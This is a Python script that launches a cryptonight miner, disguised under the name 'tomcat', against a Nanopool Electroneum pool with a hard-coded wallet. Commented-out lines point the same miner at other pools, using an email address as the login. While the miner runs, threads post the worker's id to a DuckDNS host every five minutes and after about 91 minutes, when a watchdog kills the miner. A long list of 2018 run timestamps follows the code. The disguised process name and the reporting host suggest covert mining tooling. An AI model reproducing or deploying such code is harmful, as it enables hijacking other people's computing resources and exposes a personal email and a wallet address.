import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:40:03.709809
#2018-02-17 16:26:06.108747
#2018-02-17 18:13:01.864982
#2018-02-17 20:01:01.324344
#2018-02-17 21:50:01.489933
#2018-02-17 23:34:05.906254
#2018-02-18 01:23:05.319618
#2018-02-18 03:10:06.318362
#2018-02-18 04:57:07.776308
#2018-02-18 06:48:03.504268
#2018-02-18 08:36:02.063330
#2018-02-18 10:22:04.501079
#2018-02-18 12:08:05.487436
#2018-02-18 13:53:04.566076
#2018-02-18 15:44:03.767878
#2018-02-18 17:34:07.883584
#2018-02-18 19:22:04.874415
#2018-02-18 21:07:06.118807
#2018-02-18 22:54:05.027427
#2018-02-19 00:41:06.355367
#2018-02-19 02:27:05.637474
#2018-02-19 04:14:01.634695
#2018-02-19 05:57:07.624551
#2018-02-19 07:46:05.543809
#2018-02-19 09:36:07.701620
#2018-02-19 11:25:06.519478
#2018-02-19 13:13:04.274676
#2018-02-19 15:02:06.947016
#2018-02-19 16:50:06.341367
#2018-02-19 18:36:01.422826
#2018-02-19 20:21:06.671768
#2018-02-19 22:10:05.978513
#2018-02-19 23:55:09.092625
#2018-02-20 01:42:04.584835
#2018-02-20 03:29:06.773088
#2018-02-20 05:16:01.342346
#2018-02-20 06:58:05.626077
#2018-02-20 08:44:06.136173
#2018-02-20 10:28:08.286145
#2018-02-20 12:13:01.911791
#2018-02-20 14:00:10.129968
#2018-02-20 15:44:06.557547
#2018-02-20 17:31:06.305908
#2018-02-20 19:20:10.686301
#2018-02-20 21:08:04.615424
#2018-02-20 22:53:07.498781
#2018-02-21 00:35:06.512979
#2018-02-21 02:21:04.690174
#2018-02-21 04:07:03.892406
#2018-02-21 05:54:01.781163
#2018-02-21 07:42:05.901708
#2018-02-21 09:27:05.753728
#2018-02-21 11:16:08.027498
#2018-02-21 13:06:05.282767
#2018-02-21 14:53:11.516567
#2018-02-21 16:43:01.736995
#2018-02-21 18:32:02.222607
#2018-02-21 20:16:03.075947
#2018-02-21 22:04:08.484854
#2018-02-21 23:50:07.325527
#2018-02-22 01:40:07.582806
#2018-02-22 03:27:06.170921
#2018-02-22 05:14:08.359612
#2018-02-22 06:58:03.499442
#2018-02-22 08:46:05.217731
#2018-02-22 10:33:04.978047
#2018-02-22 12:18:05.259789
#2018-02-22 14:03:11.407167
#2018-02-22 15:50:08.082054
#2018-02-22 17:36:11.638822
#2018-02-22 19:24:02.056902
#2018-02-22 21:17:04.527103
#2018-02-22 23:01:08.896204
#2018-02-23 00:48:01.600559
#2018-02-23 02:37:04.827501
#2018-02-23 04:24:07.517129
#2018-02-23 06:10:04.163692
#2018-02-23 07:57:06.691535
#2018-02-23 10:12:03.712151
#2018-02-23 12:07:08.898083
#2018-02-23 13:55:12.686796
#2018-02-23 15:46:09.640350
#2018-02-23 17:33:05.114722
#2018-02-23 19:21:08.727357
#2018-02-23 21:04:08.254570
#2018-02-23 22:50:01.505060
#2018-02-24 00:38:04.456561
#2018-02-24 03:17:01.658458
#2018-02-24 05:02:06.094806
#2018-02-24 06:52:06.818518
#2018-02-24 08:42:06.729776
#2018-02-24 10:26:06.547424
#2018-02-24 12:21:04.575766
#2018-02-24 14:14:05.493868
#2018-02-24 16:01:03.764557
#2018-02-24 17:54:05.438483
#2018-02-24 19:41:01.442008
#2018-02-24 21:27:07.871973
#2018-02-25 00:10:08.406022
#2018-02-25 04:02:01.663246
#2018-02-25 07:34:07.704079